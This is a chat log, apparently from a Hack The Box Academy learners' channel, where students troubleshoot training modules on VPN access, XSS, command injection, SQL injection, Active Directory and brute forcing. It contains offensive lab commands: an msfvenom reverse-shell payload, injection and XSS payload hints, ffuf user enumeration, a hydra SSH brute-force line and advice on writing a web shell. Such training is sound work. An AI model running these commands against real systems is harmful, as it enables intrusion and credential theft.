use cyberchef website

Cool. Thank you

👍

it's asking to be formatted in hex notation

\xAF will tell most programs that the following digits are in hex notation

so any backend binary/math is done using that

ok cool. I was not sure how to format it but i will try the hex notation. Thank you

what the module is that

and section

I got it. I was over thinking it thinking they wanted me to include the key with it.

congrats

Cracking passwords with hashcat module

💯

I forgot to cancel subscription and now it will renew in 14th sept.
If I will cancel it now, will I have access to modules until 14th sept or it will also cancel it?

you will have access still

thanks

wait

no it says 100 cubes now....

I guess I just lost 8 backs

@dim wolfand what should I do now?

contact support

great thanks

Had to use that many times while NCL was going on — good thing we're using it again here.

ssh: connect to host 10.129.6.125 port 22: No route to host

any ideas? Im connected to an eu vpn, new file as well. i have port 22 open on my vm as well.

reload target

Though when I do try and ping the target, I get this:

PING 10.129.6.125 (10.129.6.125) 56(84) bytes of data.
From 10.10.16.1 icmp_seq=1 Destination Host Unreachable
From 10.10.16.1 icmp_seq=2 Destination Host Unreachable

Try switching VPN from UDP to TCP or vice versa.

you don't need ssh open on your system to be able to ssh to the target

dest: host unreachable -- is your vpn on, and are you using the right one

do u have pwnbox open at the same time?

i had that happen to me

“SSH open”, are you referring to the client service?

My vpn is on, I’m using a eu vpn

i mean you don't need to have ssh running on your machine

and you're using the academy vpn yeah?

:)

turn the target off, hard refresh the page (ctrl+shift+r), restart the target and try again. if that doesn't work, disconnect from the vpn, re-download the ovpn file again with the server/region of your choice, and perform the previous steps i mentioned. that should do it, if not maybe reboot your vm or host machine and try the steps again.

Mhm

i have noticed sometimes the target doesn't also switch regions when you switch vpns and iirc a hard refresh fixed it for me

Btw I set up a proxy server, it was pretty cool

I’ll try

Use the academy VPN to SSH into your PwnBox. That's how I've managed to avoid a lot of issues.

that's not how that works

LMAO

you do realize the pwnbox has a publicly open interface yeah?

that you can ssh into...

got it fixed, thanks to the both of you

https://imgur.com/a/QaNTPN4

Having this issue in module something random already filled up in answer section which doesn’t make sense context wise.

info gathering module got an update recently so if you went through it previously, the old answers are still there due to how the questions are processed/stored on the backend

it's a known thing, and no they can't clear the answers

So, I have to skip them?

you don't have to skip them, i generally advise to do the questions and note down the new answers

as it's still good practice

You can also contact support to ask them whether your answer is correct or not
If your answer field is already filled by previous answers.

Anyone finished the Intro to C2 with Sliver module that could give a nudge!?

lmao whats wrong with attack common service medium
I spent like 1/10 the time in easy to complete medium

doing intro to assembly language (this might be more of a general platform question). how do i actually get the code onto my pwnbox? all the examples show {MY_USER}@htb[/htb]. is this folder already created? can't find it on the pwnbox

Hello guy

Module: Command Injections
Section: Identifying Filters
Link to section: https://academy.hackthebox.com/module/109/section/1035

I think the answer to the question at the end of the section may be incorrect. I know which of the three operators the answer is, since I guessed, but when I tried performing command injection with each of them, I got Invalid Input every time.

Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?

Could someone verify this?

The answer was correct for me

In the NTLM relay attacks module Advanced NTLM Relay Attacks Targeting AD CS
section did anyone else also face this issue? I reset the box several times and still am unable to complete as I keep getting this error. I also tried it with gettgtpkinit and same error. Google says this means the DC is not configured for kerberos authentication with pfx, so how else can I use the pfx for auth?

It should be right, what all did you do?

I tried these payloads:
||```
127.0.0.1\n
127.0.0.1%26
127.0.0.1|

||what is url encoded new line?||

||```
127.0.0.1&

You can refer the cheatsheet given

Are my payloads incorrect?

You are missing some, yes

Oh, I thought only those payloads need to be used since they're the only ones specified in the question. Cuz they asked which of those in the question work.

With this payload?
||```
127.0.0.1\n

Hint:||You may have to use burp||

I did use burp and those payloads.

Did you try the payloads in the cheatsheet?

try all versions of the "same" payload

I tried both versions of the answer, the encoded and unencoded. Still doesn't work.

Oh, you mean to submit the answer in the learning module portal? the answer is just one of the options given in the brackets

you dont have to type the payload

No, I typed just the answer and got it right. But when I test that answer by putting it in the payload, it doesn't work.

Can I dm you the answer?

I'll DM you answer I have.

Sure

anyone?

I managed to use the certificate using LDAP shell and solved it but I dont think this was the intended solution

nope, it's just a standard. /htb is not a real folder

your pwnbox will be the same for all modules

Hello there ! I'm working on "Whitebox attacks -Type juggling - Authentication Bypass," and I'm stuck.
Does anyone can nudge me?

I am currently doing nmap firewall evasion how do we know the random ips that are generated during a decoy are live or not

havent done that one personally so i dont know what the lab might be asking for but have you done what nmap docs refer to as an exotic scan ? (TCP -sC -sV -sF) type scanning?

@unique ether ^

nmap doc says that is helpful for ascertaining some further information from hosts behind a firewall

It's not lab but a concept I'm not able to get around when decoys are generated

Hy im doing the stored xxs section in sross site scripting xss module i tried many payloads to get the document.cookie nothing is workinh

probably couldn't know. nmap takes from a pool of public ip addresses (not private ones e.g. 192.168xx, 172.16xx, or 10.xx)

link ?

https://academy.hackthebox.com/module/103/section/967

Any help

replace with xxx.cookie

literally just search it up

oh you already have it

do you open and close script tags?

<script>payload</script>

Yup

there is a single example in that section. keep the alert function, put the payload in

don't use windows.origin it will just send you the current url in the PayloadAllTheThings github sources you have a way to find the cookie

Ahh

I tried alert(document.cookie) within script tag also tried print()

Both didnt wrk

he work for me

xxs works by injecting javascript code. the <script> tags denote javascript code. put your code into it

remember to take care of syntax, or better yet, copy and paste the given code

Bruh I need to do some research on this

nmap docs are the way

I am actually brain dead rn

have a break i guess

@limpid hemlock you got this!

Have u finished the path way

when you inject your payoad don't click on reset button just enter

multiple

nmap is part of like 3 pathways

How much time did u spend usually

Per day

ive done 10 hour days for a few weeks but not anymore

its erratic

Oh ok

Damn

How long it took u to complete

probably 6 months but i stopped for a while in-between

if you are talking about the pen testing one

everyone goes for it, but soc is more special imo

Hi

While logging in for the first time we are welcomed with the on-boarding process which states it would provide us with 30 additional cubes. I have skipped this process so can I reclaim my additional 30 cubes back or not. Thanks.

Hi everyone,

I'm currently stuck at the "Information Gathering - Web Edition / Virtual Hosts" stage. -> module/144/section/1257

I have an IP address, 94.237.55.3:52036, with a virtual host named inlanefreight.htb. I added this entry to my /etc/hosts file and removed any other related *.htb entries. I also flushed my DNS cache.

However, when I try to access the website via http://inlanefreight.htb:52036, it doesn’t work. It only loads if I use the IP address directly (http://94.237.55.3:52036/).

My questions:

1. I thought that by adding the domain name to /etc/hosts, the domain would be resolved directly, allowing me to access the website without using the IP address. Am I misunderstanding how this should work?
2. Because of this issue, I am unable to perform virtual host enumeration. Could anyone offer guidance on how to resolve this problem?

i think you're supposed to add the IP inside the hosts not the domain name

my /etc/hosts file something like this

ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
94.237.55.3 inlanefreight.htb

should be correct ?

this are my results

i also tried ffuff:

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://inlanefreight.htb:52036/ -H 'Host: FUZZ.inlanefreight.htb'

i got no results to filter by size, so i dont get it anymore ... XD

nvm i got it

have u tried adding the port inside the hosts file as well? i dont remember if that makes a difference

reset the maschine, it was a bug 100%

lol 🤣

i dont think that this is correct. the etc/hosts file is for resolving the domain into ip 🙂

in my case it is working bro

If I had received this answer just 5 minutes before resetting the machine, I would jump from my balcony

"it works on my maschine bro" is like biggest horror sentence after "try to reset the maschine" XDDD

you should use pwnbox too

yea man that for sure... I do the same exact things on my vm... not working. I do it on the pwnbox, it works.

hate this shit

sometimes gobuster version is not applicable for --append-domain

thanks brother, have a nice weeknd!

if you try without --append-domain in your VM
it would work

Module Password attacks
Section Pass the Ticket Linux
Question 7 (Julio ticket into smbclient)
I have the flag but it is not being accepted by the platform...again. Need to verify if the flag is correct so I don't waste time
Wrote it manually, copy pasted in notepad then into platform. Nothing
Also the exercise tells you to look for DC01\julio\julio.txt and the only file is flag.txt

cookie already cleared

Kids don't be dumb like me, make sure you connect to the correct SMB Share 🙂

Hi, can someone give me a nudge in the right direction. I am doing SQL Injections fundamentals skill assesment.

I breached through the login form and printed admin username and admin password in the table.

The flag should be in the root directory, but to either create a file or perhaps open it in another way, I need to be authenticated as admin.

I haven't found any endpoint to login at using and I don't think I can use SQL injection to do that.

The question says: Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

you have to check if the rights of the user you've found have write rights (secure file priv) if the field is empty then you have the rights then you have to analyze on which directory you have to write /var/www/html/repository and then you can make your payload to write your web shell

guys can anyone help me ? nddate doesn twork ┌──(sam㉿kali)-[~/pdf]
└─$ sudo ntpdate -u dc.intelligence.htb
2024-08-16 20:54:05.189746 (+0300) +25187.331099 +/- 0.122004 dc.intelligence.htb 10.10.10.248 s1 no-leap
CLOCK: time stepped by 25187.331099

2024/08/16 13:54:27 > [!] Tiffany.Molina@intelligence.htb:NewIntelligenceCorpUser9876 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (37) KRB_AP_ERR_SKEW Clock skew too great like bruh

can someone explain this command to me ?
wenum -w /usr/share/secLists/Discovery/Web-Content/common.txt --hc 404 -u "http://IP:PORT/get.php?x=FUZZ"

its from web fuzzing module and i cant get through the paramater and value fuzzing

Happy Friday!

Module: Active Directory Enumeration & Attacks
Section: AD Enumeration & Attacks - Skills Assessment Part I

Issue: Can not get shell to produce expected output on the box after exploiting the webshell. When running Powershell commands through the shell I get no feedback. What I've done:

1. tried different VPNs and switching between attackbox and the HTB VPN
2. tried crafting msfvenom exploit and launching it manually (msfvenom -p windows/x64/2meterpreter/reverse_tcp LHOST=<My_ip> LPORT=<tried many different ports> -f exe > shell.exe
3. tried starting a netcat listener with 'rlwrap'
4. tried sending the exploit through Metasploit (exploit/multi/handler) and (payload=windows/x64/meterpreter/reverse_tcp)
5. I've tried all of the different reverse Powershell shells that are posted on the reverse shell generator online (including base64, which does grant me a shell, it just doesnt give me any output)

I can get on the box as nt authority\system and get some tools loaded but running the tools or even basic powershell commands gives me exactly 0 output. I know the tools are running because I can see the processes running but I receive no feedback from anything that I input.

After running into these isuses I checked some youtube walkthroughs to see if they do anything differently and nothing is done differently at all, I'm just receiving different results.

Any help would be appreciated.

Module : Footprinting
section : SMTP

Hint :On systems usernames are often named after the employee's name. We recommend to use the Footprinting-wordlist provided as resource. Remember that some SMTP servers have higher response 

what i've done : I've tried enumeration using smtp-enum but its not producing any result even when timer set to 20 seconds

Module : Web Fuzzing
section: Virtual host and Sub-domain Fuzzing

Question
i did echo the ip with the adress of the webstie in /etc/hosts but still can't visit the site inlanefreight.htb

Hello, this may seem like a stupid question, but I just started the Information Security Foundations path and am in the "operating systems" section and just finished reading about the linux. Am I suppose to be installing linux as I read along or just reading and taking notes?

Couldn't hurt to get a VM with Linux on it

HTB gives you a Parrot OS terminal to be used for modules. However, if you don't have a subscription. You only get one use instance. A lot of people will download Kali or Parrot to a personal VM and use it instead of getting a subscription

Alright, thank you. Yeah the subscription is quite expensive so that would be a great idea to help save money until I find what I want to learn specifically.

Cheapest subscription is if you're a student. I think I saw it to be $8 a month. I did the monthly subscription which was $18.

Oh I didn't know there was a student subscription. Where can I find that?

just use student email to create account.

you will automatically be able to bill for students prices.

or miss the port at the url end or
miss sudo in the echo >> /etc/hosts

increase -w at 90

hey ichigo, dw, it worked!

hi! I'm trying to use responder from my kali machine using ligolo-ng (LLMNR/NBT-NS Poisoning - from Linux section) I am aware that i need some kind of port forwarding to make it work. However, i have no idea how to do it. ligolo now has the ability to give access to local ports of the target as shown here: https://github.com/nicocha30/ligolo-ng/wiki/Localhost. i have no idea if that is relevent though

also, is there another method or another tool to execute responder from a kali machine instead of using the parrot foothold machine?

So your trying to do the module on your kali vm?

You'd need a lot of port forwarding

I forget what ports but you can probably look up what ports llmnr poisoning happen on

this is taken from the notes:

UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, UDP 1434, TCP 80, TCP 135, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128, Multicast UDP 5355 and 5353

i think those are the ports youre talking about right?

¯_(ツ)_/¯

I didn't do poisoning over a pivot

i have to use responder from the parrot box via ssh. what if the foothold doesnt have responder? can i just upload the python script? Is the python script enough?

I just used the foothold and pivot from there after initial foothold

responder.py

File transfer module should have taught you how to transfer things

i know how to transfer it

Also iirc responder requires a conf file

but is the python script enough, or do i have to install it like "apt install responder"

Idk if it's included in the .py

okay...

You shouldn't be making changes to machines like installing tools in an engagement

weird... i wonder if the exam gives us a foothold with responder re-installed

No one can answer that

But the answer is likely no

yea... thought so.

Fuck around and find out in a controlled environment

That's the point of modules

yeah ill just try things LOL

The only person you fuck up the env for is you

yeah its not like its a real pentest and i fuck the client network

Module: Information gathering - Web edition
Section: DNS Zone Transfer
I am stuck on this section and was wanting to know if I'm looking too hard by wanting to brute force the nameserver? I can't seem to find it to get the count of the DNS records. I tried using dig axfr @1.1.1.1 inlanefreight.htb and that didn't work.

htb is not a valid TopLevelDomain. Therefore, the resolver 1.1.1.1 cannot resolve this domain. Use the TargetIP

oh wow I didn't know that thank you

didn't work could I bruteforce it to get the top level domain

any hint please

No

Use the spawned ip

I got it thank you thats cool

You should learn how an fqdn is structured btw

sub1.domain.tld
[www].[google].[com]

still looking for help on this if anyone can chime in:

Happy Friday!

Module: Active Directory Enumeration & Attacks
Section: AD Enumeration & Attacks - Skills Assessment Part I

Issue: Can not get shell to produce expected output on the box after exploiting the webshell. When running Powershell commands through the shell I get no feedback. What I've done:

1. tried different VPNs and switching between attackbox and the HTB VPN
2. tried crafting msfvenom exploit and launching it manually (msfvenom -p windows/x64/2meterpreter/reverse_tcp LHOST=<My_ip> LPORT=<tried many different ports> -f exe > shell.exe
3. tried starting a netcat listener with 'rlwrap'
4. tried sending the exploit through Metasploit (exploit/multi/handler) and (payload=windows/x64/meterpreter/reverse_tcp)
5. I've tried all of the different reverse Powershell shells that are posted on the reverse shell generator online (including base64, which does grant me a shell, it just doesnt give me any output)

I can get on the box as nt authority\system and get some tools loaded but running the tools or even basic powershell commands gives me exactly 0 output. I know the tools are running because I can see the processes running but I receive no feedback from anything that I input.

After running into these isuses I checked some youtube walkthroughs to see if they do anything differently and nothing is done differently at all, I'm just receiving different results.

Any help would be appreciated.

Certain commands won't produce feedback as webshells are heavily limited in the feedback they provide

I understand that, but as stated above, the walkthroughs on youtube are getting feedback and i am not. the feedback is required to enumerate the odmain

You shouldn't be watching videos on ad enum module as it's a t1+ module

Those videos break HTB ToS/content guidelines

i didnt make them, i went to them when the lab wasnt working feel free to direct that to them

And I'm stating, watching those videos is tantamount to cheating

That's how htb sees it

if any non-Karens have actual advice, which you apparently dont, lmk please thank you

Oh fuck off, I was simply informing you not like I pinged mods on it

not looking for SJWs that want to complain about things, just trying to see if this issue is repeatable, thanks again

Well shit I was gonna give actual advice but nah, you want to go to name calling

nah you werent, you have none but thanks lol

I didn't get this role by not being helpful ¯_(ツ)_/¯

your advice was "some commands arent supposed to give feedback" lol

clearly this is, as stated in the original post

And I was gonna ask what commands have you tried

you werent, you just like being a karen

Aside from the netcat/revshell commands

I get it, it makes you feel important, Im glad you have that going for you, just direct it elsewhere

I'm trying to fucking help you at this point

totally

.

Aside from the ones in your post

anyways, if anyone has advice on that issue much appreciated. is it repeatable from your side, etc. will keep working on it

Also fwiw, any command with revshell that requires the powershell -nop -c you can cut out that part

Since you're already in ps

Also by no output, sometimes windows revshells don't output anything until you hit enter once

But it all depends

Anyone who can help me with the Broken Authentication Skills assesment?

thank you ya I need to review a bunch of stuff

No sorry I'm just a not helpful SJW Karen (i haven't done this module. Parroting others, don't bruteforce otp)

helps to write what you're stuck on, what you did, ...

I didn't even reached that step. I am stuck on the enumerating the users. :))

Also https://dontasktoask.com

I used this commands to try to enumerate a good user

ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -u http://94.237.59.199:46165/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=Password1234" -mc 302 -t 150 -r

ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -u http://94.237.59.199:46165/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=Password1234" -fr "Invalid credentials." -fs 302

I tried to use the commands presented in the sections of the modules, but no success.
I saw that for a correct login you get a 302 status code.

I am stuck

You used quotes here, not backticks/grave

` not '

hey if nobody can help you you can always use the search tool in discord. There's always really good hints it search all the conversions

On this channel or where?

On this channel

right hand corner of this channel

-fs filters response size, not response code

Web Attacks - Skills Assessment

That is indeed in the academy

Capture every request made and send to repeater

Never know when one is gonna be useful

I figured out that -fs is for size, and then i used -mc, but still nothing.

Did this and I can't see anything that catch my attention.

Wasn't talking to you

is there a different response for valid username but invalid password

Ohh, my bad

I was referring to the dude that said "Web Attacks - Skill Assessment"

Since yk that says nothing about where they're at

There are 2 "Invalid credentials" - good user, bad password, and "Unknown username or password" - for bad user, bad password.

yea.. so you're filtering out the response for the former

i think

change the regexp

Need some help with the XSS hijacking, am I supposed to add the scripts in the registration url?

Did that, and after 200 requests, i get all the logins as being good xD

Or should i use -fr in conjunction with -mc?

Read the section and explanations

mc doesn't do much for logins

As you don't get a different code for success/fail auth

what's your regexp filter

Then maybe i have to restart the machine. Becuse if i use this command:

fuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -u http://94.237.59.199:46165/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=Password1234" -fr "Invalid credentials."

After ~200 logins attempts i get all users as being good, which of course, is not the case.

-fr "Invalid credentials."

you are filtering out responses for good username bad password

change the regexp to the message you get for bad username bad password

I get all usernames as being good if i do that, from the first request send

Hello guys, for anyone has already achieved Advanced SQL Injections - Skill Assessment. May I know why I use aNd will work, but oR or Or does not work?

that should not be the case

Maybe, but it's not the 1st time when I am trying to troubleshoot a problem that doesn't exist. HTB modules machines are not that good...

if it still persists after reset, it's most likely some user error

i don't see anything wrong with your command though

If i would pay for this from my own money I would've benn pissed..

Is there any way to filter modules by tier?

After reset it seems that it works...

That is my problem with HTB. If a beginner tries multiple ways of solving a module and it the solvings that he tried was the good answer, but the machine and lab sucks, is very bad as a learning experince...

I guess that after i find a good user, i should find a good password for that user. And then is that step with the OTP, right?

And nobody is taking this feedback in consideration.

/feedback

send feedback with this command

Is that the correct filter? "Invalid credentials."

#modules message

the regex statement used by the dev is case insensitive.

Sidebar, modules, there's a filter option at the top

It's weird not seeing you as staff. Feels wrong

i am no longer one

Ik but it just feels off 😆

How to configure SMB Null session vulnerability for username and domain enumeration?
I tried a lot through Registry and GPO, but cannot figure it out.

smbclient -N -L //<host>, enum4linux-ng

both oR and Or should work, not sure why they wont.

found the vunerable input

head hurt, but im so glad im learning this through htb

can i dm someone for help

I deleted the picture because it contains spoilers.
Check your domain. You forgot the TLD.

yep I wonder why it is. Cause I did test via online java for the pattern of filter. It should works... it is weird

Yeah! I remember that! For some reason it's missing now and all I have is the search filter.

Thanks, I'll try again.

Hello. Trying to review hydra commands. Is there something wrong with this command? Hydra is being very slow at going through 100 passwords ...:
hydra -l "b.gates" -P extracted_passwords.txt ssh://94.237.55.3:42396

that's because you're brute-forcing SSH

^

It sucks but that's just how it is

Bruteforce module yeah?

Hey Calc, Since u did the CBBH, can u please give me some tips at what to prep? I am already going through every single exercise for review.. What else should I do? I kind of want to do the white box modules on CWEE for an advantage... Maybe I will learn more about web apps

Yeah it is

the problem is in your query then. send it via dm